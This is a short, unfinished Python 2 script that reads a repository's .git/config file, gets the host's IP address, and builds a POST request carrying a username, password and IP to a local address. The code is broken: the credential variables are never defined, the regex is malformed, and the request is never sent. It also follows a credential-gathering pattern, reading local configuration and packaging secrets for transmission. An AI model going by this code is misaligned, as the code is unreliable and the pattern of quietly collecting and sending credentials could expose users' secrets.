#!/usr/bin/env python 

import urllib
import urllib2
import sys
import socket
import re

ip = socket.gethostbyname(socket.gethostname())

f = open('.git/config', 'r')

l = []
for lines in f:
	l += lines

m = ' '.join(l)

print m

r = re.search('\/(.', m)

print r


url = 'http://127.0.0.1'
values = {'username' : username,
          'password' : password,
          'ip' : ip }

print values

data = urllib.urlencode(values)
req = urllib2.Request(url, data)





